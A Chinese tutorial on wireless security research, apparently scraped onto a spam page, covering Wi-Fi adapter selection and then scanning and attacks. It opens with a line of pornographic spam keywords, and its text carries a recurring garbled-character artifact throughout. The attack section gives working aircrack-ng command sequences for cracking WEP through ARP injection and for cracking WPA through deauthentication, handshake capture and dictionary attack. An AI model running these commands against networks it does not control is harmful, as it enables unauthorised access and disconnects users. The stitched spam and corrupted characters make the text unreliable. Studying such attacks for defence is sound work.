国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

Tags：應(yīng)用安全(1006)無線安全(60)掃描器(4)　　

　　一、無線安全研究需要的軟硬件選型、及物理電氣參數(shù)

　　在進(jìn)行實(shí)際的無線安全攻擊、研究之前，我們需要準(zhǔn)備一些硬件設(shè)備、包括與之配套的軟件?；旧蟻碚f，無線黑客技術(shù)需要涉及到以下幾個(gè)組件

　　1. 底層芯片組

　　不論是USB網(wǎng)卡、PCI網(wǎng)卡、還是PCMCIA內(nèi)置網(wǎng)卡，它們的核心都是"芯片組"，即我們現(xiàn)在常說的卡皇、無線網(wǎng)卡的不同牌子，本質(zhì)上應(yīng)該討論它們內(nèi)部使用的芯片組，我們要關(guān)注的電氣性能也是針對(duì)芯片組的。

　　2. 芯片驅(qū)動(dòng)程序

　　芯片是硬件設(shè)備，Ring3的應(yīng)用程序需要通過驅(qū)動(dòng)程序來和芯片的指定端口通信，從而使用芯片的物理特性(發(fā)送、接收數(shù)據(jù)幀)，Linux下的無線驅(qū)動(dòng)程序經(jīng)過了一段"發(fā)展期"，最終以

　　"mac80211驅(qū)動(dòng)框架"作為最終的"主樹結(jié)構(gòu)"

　　http://wireless.kernel.org/en/developers/Documentation/mac80211

　　mac80211是一個(gè)無線驅(qū)動(dòng)的框架，它提供了大量的API、規(guī)范，在這個(gè)框架下編寫驅(qū)動(dòng)程序能和其他的驅(qū)動(dòng)具有良好的共享性、兼容性(類似與windows下的NDIS框架的作用)

　　5) Realtek(RTL系列)

　　http://www.realtek.com.tw/DOWNLOADS/downloadsView.aspx?Langid=1&PNid=14&PFid=7&Level=5&Conn=4&DownTypeID=3&GetDown=false

　　需要注意的，我們在選擇驅(qū)動(dòng)的時(shí)候需要關(guān)注一下當(dāng)前驅(qū)動(dòng)是否支持USB(因?yàn)楝F(xiàn)在大多數(shù)人包括我自己都是使用外置網(wǎng)卡(卡皇)進(jìn)行實(shí)驗(yàn)的)

　　3. 應(yīng)用程序編程接口(API)(不是必須)

　　本質(zhì)上來說，我們可以直接編寫ring3代碼，調(diào)用驅(qū)動(dòng)的編程接口來實(shí)現(xiàn)我們想要的功能。但是從實(shí)現(xiàn)難度、開發(fā)成本上來講，還是太過麻煩了。為此，開源社區(qū)開發(fā)了一些封裝良好的、功能完善的

　　API庫，講對(duì)驅(qū)動(dòng)的調(diào)用作了一層封裝，使上層應(yīng)用能更方便、快速地進(jìn)行WLAN軟件的開發(fā)

　　1) OSDEP

　　Aircrack-ng就是基于OSDEP的API進(jìn)行開發(fā)的

　　http://freecode.com/projects/aircrack-ng

　　2) LORCON2

　　http://blog.opensecurityresearch.com/2012/05/installing-lorcon2-on-backtrack-5-r2.html

　　3) libpcap

　　Libpcap提供了系統(tǒng)獨(dú)立的用戶級(jí)別網(wǎng)絡(luò)數(shù)據(jù)包捕獲接口，并充分考慮到應(yīng)用程序的可移植性

　　http://sourceforge.net/projects/libpcap/

　　4. 無線安全軟件工具

　　到了這一層就是我們在Linux下常見的各種類型的工具軟件

　　它們主要完成如下幾個(gè)功能

　　1) 使用"監(jiān)控模式"捕獲指定"信道"上的無線數(shù)據(jù)報(bào)，達(dá)到嗅探的目的

　　2) 數(shù)據(jù)包注入，即重放任意數(shù)據(jù)的數(shù)據(jù)幀，主要有如下目的

　　2.1) 造成DDOS效果，使流量增加，加速WEP攻擊

　　2.2) 注入解除認(rèn)證(deauthentication)數(shù)據(jù)包，使用該數(shù)據(jù)包可以把用戶和AP斷開，從而獲取WPA的4次握手?jǐn)?shù)據(jù)包，然后可進(jìn)行離線字典、或彩虹表密碼破解

　　3) 主動(dòng)發(fā)送"探測數(shù)據(jù)包"，進(jìn)行主動(dòng)的服務(wù)(SSID)發(fā)現(xiàn)

　　4) 信號(hào)干擾

　　需要注意的一點(diǎn)是:

　　本文討論的驅(qū)動(dòng)、軟件都是在Linux平臺(tái)下的，我也嘗試過在windows下基于winpcap進(jìn)行編程、嗅探攻擊的使用，結(jié)果發(fā)現(xiàn)問題頗多(各種蛋疼)，無法順利地開展研究工作，索性完全放棄windows下的嘗試，改為在Linux下進(jìn)行，所以，本文所涉及到的驅(qū)動(dòng)、掃描器都是在Linux下使用的，后面將不再聲明

　　我們前面說過，不同型號(hào)的網(wǎng)卡的"主要差別"在于內(nèi)置的芯片組，但是，一個(gè)無線網(wǎng)卡的好壞除了和上面說的芯片組、驅(qū)動(dòng)有關(guān)，還和它自身的一些物理、電氣特性有關(guān)，下面我們來一起逐一學(xué)習(xí)一下。

　　一般來說，綜合評(píng)價(jià)一個(gè)網(wǎng)卡的性能，有如下幾個(gè)維度

　　1. 芯片組型號(hào)2. 發(fā)射(TX)功率

　　3. 天線的支持(信號(hào)增益、類型)

　　4. 靈敏度

　　5. 頻率范圍

　　6. 工作信道(是否支持跳頻)

　　7. 支持的模式

　　8. 是否支持USB接口

　　9. 價(jià)格

　　0×1: 芯片組型號(hào)

　　就我個(gè)人經(jīng)驗(yàn)來看，目前主流的這些芯片廠商的芯片性能都沒有什么太大的差別(至少對(duì)于中低端網(wǎng)卡來說沒有)。我在實(shí)驗(yàn)的時(shí)候選擇的是"RT3070L"芯片，在BT5下也默認(rèn)對(duì)它提供了驅(qū)動(dòng)支持，所以前期準(zhǔn)備這塊比較方便。一般來說，當(dāng)網(wǎng)卡的價(jià)格到達(dá)數(shù)千級(jí)別，芯片的型號(hào)的差異可能會(huì)帶來性能的差別。

　　在芯片選型的時(shí)候，我們要關(guān)注的是這個(gè)芯片的驅(qū)動(dòng)支持情況，以下命令可以幫助我們更好地完成這個(gè)目標(biāo)

　　airdriver-ng supported

　　airdriver-ng details 序號(hào)

　　airdriver-ng installed

　　0×2: 發(fā)射(TX)功率

　　發(fā)射功率是我們需要重點(diǎn)關(guān)注的一個(gè)維度，當(dāng)我們在wireless模式下需要發(fā)送數(shù)據(jù)包的時(shí)候，協(xié)議棧會(huì)將我們的數(shù)據(jù)包層層封裝，最終封裝成"數(shù)據(jù)幀"，最終通過無線網(wǎng)卡轉(zhuǎn)換為射頻信號(hào)(一種電磁脈沖)，通過饋線(電纜)輸送到天線，由天線以電磁波形式輻射出去(如果你是插網(wǎng)線就是通過網(wǎng)口發(fā)送出去)。電磁波在介質(zhì)(空氣)中傳播過程中會(huì)不斷衰減，這也是為什么我們不能接收到離我們很遠(yuǎn)的地方的Wi-Fi信號(hào)的原因，電磁波到達(dá)接收地點(diǎn)后，由天線接收下來(僅僅接收很小很小一部分功率，因?yàn)殡姶挪ㄊ窍蛩闹芡瑫r(shí)擴(kuò)散的)，并通過饋線送到目標(biāo)無線接收設(shè)備中，因此在無線網(wǎng)絡(luò)的工程中，計(jì)算發(fā)射裝置的發(fā)射功率與天線的輻射能力非常重要。

　　Tx是發(fā)射(Transmits)的簡稱。無線電波的發(fā)射功率是指在給定頻段范圍內(nèi)的能量，通常有兩種衡量標(biāo)準(zhǔn)：

　　1. 功率(W): 單位是瓦(Watts)的線性水準(zhǔn)。例如我自己實(shí)驗(yàn)用的無線網(wǎng)卡的發(fā)射功率為0.063W，或者說63mW2、增益(dBm 或者叫分貝): 63mW換算成增益(dBm)就是18dBm

　　功率單位mW(豪瓦)和dBm(分貝)的換算

　　1. dBm = 10 x log [功率mW]2. mW = 10 [增益dBm / 10dBm]

　　在"小功率"系統(tǒng)中(例如無線局域網(wǎng)絡(luò)設(shè)備)每個(gè)dB都非常重要，特別要記住"3dB法則"，即:

　　1) 增加3dB: 增加一倍功率

　　2) 降低3dB: 降低一半功率

　　功率每增加一倍，電平值增加 3dBm。對(duì)于AP、或本地網(wǎng)卡的信號(hào)強(qiáng)度的測量，有很多工具可以完成

　　1. 頻譜分析儀(專業(yè)設(shè)備): 淘寶上很多，幾千塊一套

　　2. Inssider(下圖)

　　0×3: 天線的支持(信號(hào)增益、類型)

　　天線對(duì)于一個(gè)無線網(wǎng)卡的性能來說是至關(guān)重要的，雖然常常它們看起來并不是那么重要，如果說有線寬帶之間進(jìn)行連接的介質(zhì)是電纜、或者光纖，那么對(duì)于無線網(wǎng)絡(luò)來說，空氣就是它的傳輸介質(zhì)，而天線就相當(dāng)于NIC網(wǎng)卡和空氣介質(zhì)的"連接器"(作用類似于水晶頭)

　　在無線系統(tǒng)中，天線被用來把電流波轉(zhuǎn)換成電磁波，在轉(zhuǎn)換過程中還可以對(duì)發(fā)射和接收的信號(hào)進(jìn)行"放大"，這種能量放大的度量成為"增益(Gain)"。天線增益的度量單位為"dBi"。

　　由于無線系統(tǒng)中的電磁波能量是由發(fā)射設(shè)備的發(fā)射能量和天線的放大疊加作用產(chǎn)生，因此度量發(fā)射能量最好同一度量-增益(dB)，例如，發(fā)射設(shè)備的功率為100mW(20dBm)，天線的增益為10dBi，則發(fā)射總能量:

　　發(fā)射功率(dBm) + 天線增益(dBi) = 20dBm + 10dBi = 30dBm

　　需要注意的是，我們對(duì)于"天線"這個(gè)詞可能會(huì)有先入為主的概念，像小時(shí)候玩的收音機(jī)上面看到的那種金屬棒，其實(shí)，從物理學(xué)的角度來看，"天線"應(yīng)該是一個(gè)抽象的概念，它指一切可以匯聚、增益、并發(fā)送電磁信號(hào)的設(shè)備，我們可以這么理解:

　　天線通過聚集于網(wǎng)卡已經(jīng)產(chǎn)生的信號(hào)來工作。網(wǎng)卡產(chǎn)生一個(gè)信號(hào)，形狀類似于一個(gè)三維球體。全向天線的工作基本上是接收這種球體并"壓扁"更多圓圈，這樣在水平面的信號(hào)傳的更遠(yuǎn)，但垂直方向上沒這么遠(yuǎn)。更重要的是，全向天線的增益越高，圓形圖就"越扁平"。定向天線以同樣的方式工作，犧牲一個(gè)方向的信號(hào)，以獲取另一個(gè)方向的信號(hào)

　　天線可以大致分為兩種類型:

　　1. 全向天線(Omnidirectional Antenna)

　　在所有方向上擴(kuò)大范圍的天線

　　1) 基站天線: 9~12dBi的增益

　　通常有白色PVC管，長30或48英寸。天線越長，增益越高

　　2) 磁性底座天線(magnetic mount antennas): 5~9dBi的增益

　　戰(zhàn)爭駕駛(wardriving)中效果最好

　　2. 定向天線

　　向一個(gè)指定方向擴(kuò)大范圍的天線

　　1) 波導(dǎo)天線(cantennas)

　　http://www.antenna-theory.com/cn/antennas/aperture/slottedWaveguide.php

　　2) 引向發(fā)射天線: 波導(dǎo)天線的提升

　　3) 板狀天線(panel antenna)

　　http://baike.baidu.com/view/8695946.htm

　　主要用于室外信號(hào)覆蓋。無論是GSM 還是CDMA， 板狀天線是用得最為普遍的一類極為重要的基站天線

　　4) 八木天線(yagi antenna)

　　http://zh.wikipedia.org/wiki/%E5%85%AB%E6%9C%A8%E5%A4%A9%E7%BA%BF

　　外形十分酷炫，淘寶上有很多可以買

　　5) 拋物面天線(parabolic antenna)

　　http://baike.baidu.com/view/880872.htm

　　提供最大的增益、最窄的波束。由拋物面反射器和位于其焦點(diǎn)處的饋源組成的面狀天線叫拋物面天線。我們在電視上看到的雷達(dá)的那個(gè)圓盤就是這種天線

　　0×4: 靈敏度

　　靈敏度同樣是一個(gè)我們需要關(guān)注的維度，我們在使用電流表的時(shí)候都會(huì)聽說過一個(gè)概念，這個(gè)設(shè)備的靈敏度是多少，表明這個(gè)設(shè)備能"感知"到最小的電流是多少，對(duì)于天線來說也一樣，靈敏度決定了我們的無線網(wǎng)卡能夠接收到多么微弱的信號(hào)，即能收到多遠(yuǎn)的AP發(fā)來的數(shù)據(jù)包，這在進(jìn)行黑客攻擊的時(shí)候很重要，因?yàn)檫@意味著你能夠在原理目標(biāo)更遠(yuǎn)的距離發(fā)起無線攻擊。

　　我們通常用dBm(分貝)測量靈敏度，負(fù)數(shù)越小越好(即-90表明比-80更靈敏)，大家可以畫一個(gè)Log函數(shù)圖，就會(huì)發(fā)現(xiàn)知道原理了(靈敏度功率越小、負(fù)值越大、感知靈敏度越好)，在天文學(xué)名詞庫中可以找到關(guān)于"天線靈敏度"的定義

　　http://www.lamost.org/astrodict/dict_details.php?U=8078

　　0×4: 頻率范圍

　　這里的頻率指的是無線網(wǎng)卡的工作頻段，IEEE802.11下的無線信號(hào)工作在

　　1. 2.4GHz頻段

　　2. 4.9/5.8 GHz頻段

　　頻率本身只是表示電磁波的"每秒震動(dòng)次數(shù)"，并沒有其他的意義，2.4和4.9/5.8GHz的傳輸速度都是一樣的，并且它們互相不干擾。注意，因?yàn)榛ハ嗖桓蓴_，所以意味著你的設(shè)備如果是2.4GHz工作模式的，則不能接收工作在5GHz下的數(shù)據(jù)包，同樣，市場主流賣的無線網(wǎng)卡、卡皇都是2.4GHz的，而5GHz的設(shè)備國外的Shop上很多，但價(jià)格相對(duì)較貴。所以從某種程度上來說，將工作頻率切換到5GHz是一種對(duì)抗無線嗅探攻擊的手段

　　0×5: 工作信道(是否支持跳頻)

　　Wi-Fi總共有14個(gè)信道(IEEE的標(biāo)準(zhǔn)，各個(gè)國家的具體標(biāo)準(zhǔn)稍有不同)

　　1. IEEE 802.11b/g標(biāo)準(zhǔn)工作在2.4G頻段，頻率范圍為2.400—2.4835GHz，共83.5M帶寬

　　2. 劃分為14個(gè)子信道

　　3. 每個(gè)子信道寬度為22MHz

　　4. 相鄰信道的中心頻點(diǎn)間隔5MHz

　　5. 相鄰的多個(gè)信道存在頻率重疊(如1信道與2、3、4、5信道有頻率重疊)

　　6. 為了保證信道的不干擾性，整個(gè)頻段內(nèi)只有3個(gè)(1、6、11)互不干擾信道(注意下圖中紅色的半圓的中間對(duì)應(yīng)的數(shù)字)

　　其他國家的信道劃分

　　1. 中國: 2.4GHz-2.4835GHz(13信道)

　　2. 北美/FCC: 2.412-2.461GHz(11信道)

　　3. 歐洲/ETSI: 2.412-2.472GHz(13信道)

　　4. 日本/ARIB: 2.412-2.484GHz(14信道)

　　0×5: 支持的模式

　　目前主流的無線網(wǎng)卡的工作模式有:

　　11b: 1/2/5.5/11Mbps

　　11g: 6/9/12/18/24/36/48/54Mbps

　　11n: 最高可達(dá)150Mbps

　　在這篇文章的開頭，列舉目前802.11家族的工作模式

　　http://www.cnblogs.com/LittleHann/p/3700357.html

　　在網(wǎng)卡選型的時(shí)候，看清楚工作模式很重要，因?yàn)樵诤虯P進(jìn)行連接交互的時(shí)候，會(huì)有一個(gè)工作模式的協(xié)商過程:

　　只有客戶端和AP都支持某個(gè)工作模式，雙方才能繼續(xù)進(jìn)行連接。

　　這很像SSL、TLS初始認(rèn)證的時(shí)候會(huì)進(jìn)行加密算法的協(xié)商過程

　　0×6: 是否支持USB接口

　　無線網(wǎng)卡是否有外設(shè)的USB接口

　　0×7: 價(jià)格

　　關(guān)于無線網(wǎng)卡的選型，可以參考下面的鏈接

　　網(wǎng)卡性能對(duì)比: http://wireless.kernel.org/en/users/Devices

　　FCC認(rèn)證查詢(進(jìn)入美國市場的電子產(chǎn)品必須通過FCC認(rèn)證，該認(rèn)證具有強(qiáng)制性): http://transition.fcc.gov/oet/ea/fccid/

　　二、無線攻擊第一步: "網(wǎng)絡(luò)AP探測"、掃描器的使用

　　了解了無線網(wǎng)卡的選型之后，我們就作好了進(jìn)行無線安全研究的基礎(chǔ)準(zhǔn)備工作，接下來要開始無線安全研究的第一步，也是我們面對(duì)的第一個(gè)問題，如何找到我們的攻擊目標(biāo)，即"網(wǎng)絡(luò)AP探測(服務(wù)發(fā)現(xiàn))"，要完成這個(gè)目標(biāo)，我們需要借助掃描器(Scanner).

　　我們前面說過，基本上來說，無線安全軟件需要完成如下幾個(gè)功能:

　　1) 使用"監(jiān)控模式"捕獲指定"信道"上的無線數(shù)據(jù)報(bào)，達(dá)到嗅探的目的

　　2) 數(shù)據(jù)包注入，即重放任意數(shù)據(jù)的數(shù)據(jù)幀，主要有如下目的

　　2.1) 造成DDOS效果，使流量增加，加速WEP攻擊

　　2.2) 注入解除認(rèn)證(deauthentication)數(shù)據(jù)包，使用該數(shù)據(jù)包可以把用戶和AP斷開，從而獲取WPA的4次握手?jǐn)?shù)據(jù)包，然后可進(jìn)行離線字典、或彩虹表密碼破解

　　3) 主動(dòng)發(fā)送"探測數(shù)據(jù)包"，進(jìn)行主動(dòng)的服務(wù)(SSID)發(fā)現(xiàn)

　　4) 信號(hào)干擾

　　接下來，我們逐一學(xué)習(xí)一下要完成這些目標(biāo)會(huì)用到的軟件、以及它們的原理

　　0×1: 數(shù)據(jù)包嗅探

　　數(shù)據(jù)包嗅探軟件監(jiān)視給定"信道"上數(shù)據(jù)包的無線信號(hào)，它自身不發(fā)送數(shù)據(jù)包。相反，它們使用監(jiān)控模式(Monitor Mode)監(jiān)聽信道上的所有數(shù)據(jù)包。

　　把一個(gè)無線網(wǎng)卡設(shè)置為"監(jiān)控模式"類似于把一個(gè)正常的有線以太網(wǎng)卡設(shè)置為混雜模式(Promiscuous Mode)。在這種情況下，可以看到所有走過"線纜"(或信道)的數(shù)據(jù)包。

　　然而，它們之間的關(guān)鍵的區(qū)別是:

　　1) 把有線網(wǎng)卡設(shè)置為混雜模式時(shí)，你所捕獲到的數(shù)據(jù)包一定存在于當(dāng)前信道中(同一個(gè)Hub局域網(wǎng)中)

　　2) 在無線網(wǎng)絡(luò)的情況下，因?yàn)?.4GHz范圍的波段頻率是非授權(quán)的，它是可以共享訪問的，這意味著使用同一個(gè)信道可以有多個(gè)重疊網(wǎng)絡(luò)(頻分復(fù)用)。監(jiān)控模式下看到的數(shù)據(jù)包可能存在于多個(gè)信道中

　　3) 對(duì)于有線網(wǎng)卡來說，以太網(wǎng)卡的混雜模式是一個(gè)標(biāo)準(zhǔn)功能

　　4) 但是對(duì)于無線網(wǎng)卡的監(jiān)控模式，則不能簡單地假設(shè)其肯定有監(jiān)控模式的功能

　　4.1) 網(wǎng)卡本身的芯片必須支持這種模式

　　4.2) 正在使用的驅(qū)動(dòng)程序本身也必須支持監(jiān)控模式

　　數(shù)據(jù)包嗅探掃描工具的原理

　　1) 將無線網(wǎng)卡置于監(jiān)控模式

　　2) 掃描程序進(jìn)入一個(gè)循環(huán)狀態(tài)，不停地從網(wǎng)卡讀取數(shù)據(jù)包、進(jìn)行分析、同時(shí)更新用于界面

　　使用Kismet來進(jìn)行無線嗅探

　　Kismet不僅是一個(gè)掃描工具，Kismet其實(shí)是一個(gè)802.11協(xié)議數(shù)據(jù)包捕獲、分析的框架(Kismet捕獲到的數(shù)據(jù)包可以轉(zhuǎn)儲(chǔ)下來，給其他的分析框架使用)。它由3個(gè)部分組成:

　　1. kismet_server

　　2. kismet_client

　　3. kismet(ELF): 一個(gè)可執(zhí)行文件，它kismet進(jìn)行典型配置

　　在BT5下輸入Kismet，Kismet會(huì)自動(dòng)檢測合適的源網(wǎng)卡

　　點(diǎn)擊菜單欄的"S"可以對(duì)AP進(jìn)行排序，點(diǎn)擊特定的SSID，可以查看詳細(xì)信息:

　　0×2: 數(shù)據(jù)包注入

　　Google上有很多"WEP密碼破解"、"WPA"、"WP2密碼破解"、也有很多自動(dòng)化工具(如wifite、fern-wifi-cracker)，它們破解的原理就是數(shù)據(jù)包注入

　　使用Airodump-ng系列軟件來進(jìn)行無線數(shù)據(jù)包注入、密碼破解

　　1. WEP

　　通過靜默捕獲IVS數(shù)據(jù)包，或主動(dòng)注入ARP數(shù)據(jù)包(這是一種數(shù)據(jù)幀)，加快當(dāng)前信道中的流量來加速破解，最終的目的是捕獲足夠多的IVS數(shù)據(jù)包，從而利用RC4算法的缺陷來逆向出key

　　example:

　　ifconfig wlan1 up

　　airmon-ng start wlan1

　　airodump-ng mon0

　　airodump-ng --ivs -w longas -c 6 mon0

　　//這個(gè)時(shí)候理論上可以等待抓包抓到足夠數(shù)量就可以了，但是為了加快抓包速度，可以采用arp注入的方式來加快抓包

　　//重新打開一個(gè)新的console，然后執(zhí)行arp注入命令

　　aireplay-ng -3 -b 08:10:77:CF:C9:62 -h CC:AF:78:26:77:BD mon0

　　//抓包結(jié)束后，確保抓到了足夠熟練的IVs包，開始破解

　　aircrack-ng longas-01.ivs

　　如果抓到的IVs包數(shù)量不夠，會(huì)遇到破解失敗，最好能抓到2W以上的包數(shù)量

　　2. WPA

　　通過主動(dòng)注入Deanthentication/Disassociation數(shù)據(jù)包(它們屬于管理幀，試圖告訴AP某個(gè)客戶端想斷開連接，顯然這并不是這個(gè)客戶端的本意)，來強(qiáng)制斷開目標(biāo)客戶端和AP的Wi-Fi，連接，當(dāng)目標(biāo)試圖和AP進(jìn)行重連接的時(shí)候，黑客捕獲握手4次包(Handshak Package)，然后利用離線字典、或者彩虹表進(jìn)行暴力破解

　　example:

　　ifconfig wlan0 up

　　airmon-ng start wlan0

　　airodump-ng mon0

　　//開始捕獲無線數(shù)據(jù)包

　　airodump-ng --ivs -w longas -c 6 mon0

　　//另開一個(gè)console，進(jìn)行Deauth攻擊，為了捕獲握手包

　　aireplay-ng -0 1 -a 08:10:77:CF:C9:62 -c CC:AF:78:26:77:BD mon0

　　//在右上角看到了 WPA handshake提示后，表示抓到了握手包，開始破解WPA-PSK

　　aircrack-ng -w /pentest/passwords/wordlists/test.lst longas-01.ivs

　　要注意的一點(diǎn)是，WEP中注入的是數(shù)據(jù)幀，而WPA破解中注入的是管理幀，關(guān)于IEEE802.11幀的格式，我在另一篇文章中總結(jié)了一下

　　http://www.cnblogs.com/LittleHann/p/3700357.html

　　0×3: 服務(wù)發(fā)現(xiàn)、主動(dòng)發(fā)送探測數(shù)據(jù)包

　　為了在一定程度上對(duì)抗無線嗅探攻擊，很多的無線網(wǎng)絡(luò)AP采取了一些配置:

　　1. 開啟隱藏模式(Hidden Mode)、或非廣播模式(nonbroadcasting Mode)。這些網(wǎng)絡(luò)在其"信標(biāo)幀"數(shù)據(jù)包(一種管理幀)中并不包括SSID值(網(wǎng)絡(luò)名稱)，它們也不回復(fù)廣播類的探測請求

　　2. MAC地址過濾，只接收指定執(zhí)行范圍內(nèi)的MAC地址的廣播探測請求

　　這樣造成的直接結(jié)果就是我們在"寬帶連接列表"中看不到對(duì)應(yīng)的SSID(WiFi名稱)

　　針對(duì)這種防御手段，掃描器也采取了相應(yīng)的技術(shù)來獲得隱藏的SSID

　　1. 通過學(xué)習(xí)802.11的幀結(jié)構(gòu)，我們知道802.11的管理幀是不需要授權(quán)的，所以，我們要做的就是把AP、或者給目標(biāo)用戶發(fā)送一個(gè)"解除關(guān)聯(lián)數(shù)據(jù)幀(Disassociation Frame)"，這樣，目標(biāo)用戶就會(huì)和AP嘗試進(jìn)行"重新關(guān)聯(lián)"，這個(gè)管理幀會(huì)包含SSID。

　　這同時(shí)也是WPA破解的基本條件，這本質(zhì)上屬于協(xié)議上的漏洞，IEEE協(xié)會(huì)似乎已經(jīng)開始著手修補(bǔ)，但我目前還沒有看到有新版本的協(xié)議格式發(fā)布

　　2. 除了在Beacon管理幀有有SSID，在普通的數(shù)據(jù)幀、控制數(shù)據(jù)發(fā)送的控制幀中同樣會(huì)包含SSID(明文)，可以通過捕獲這類數(shù)據(jù)幀來獲取SSID，并加入U(xiǎn)I的顯示列表

　　3. 后記

　　無線的安全研究有蠻多方向的，Google上比較多的文章是密碼破解、工具使用方向的，講的都很精彩，除此之外，個(gè)人覺得還可以和傳統(tǒng)的內(nèi)網(wǎng)安全問題結(jié)合起來，比如說:

　　1. 偽AP，流量劫持: 能達(dá)到和ARP投毒相似的效果

　　2. MIT中間人攻擊

　　3. 基于中間人攻擊的SSL明文竊取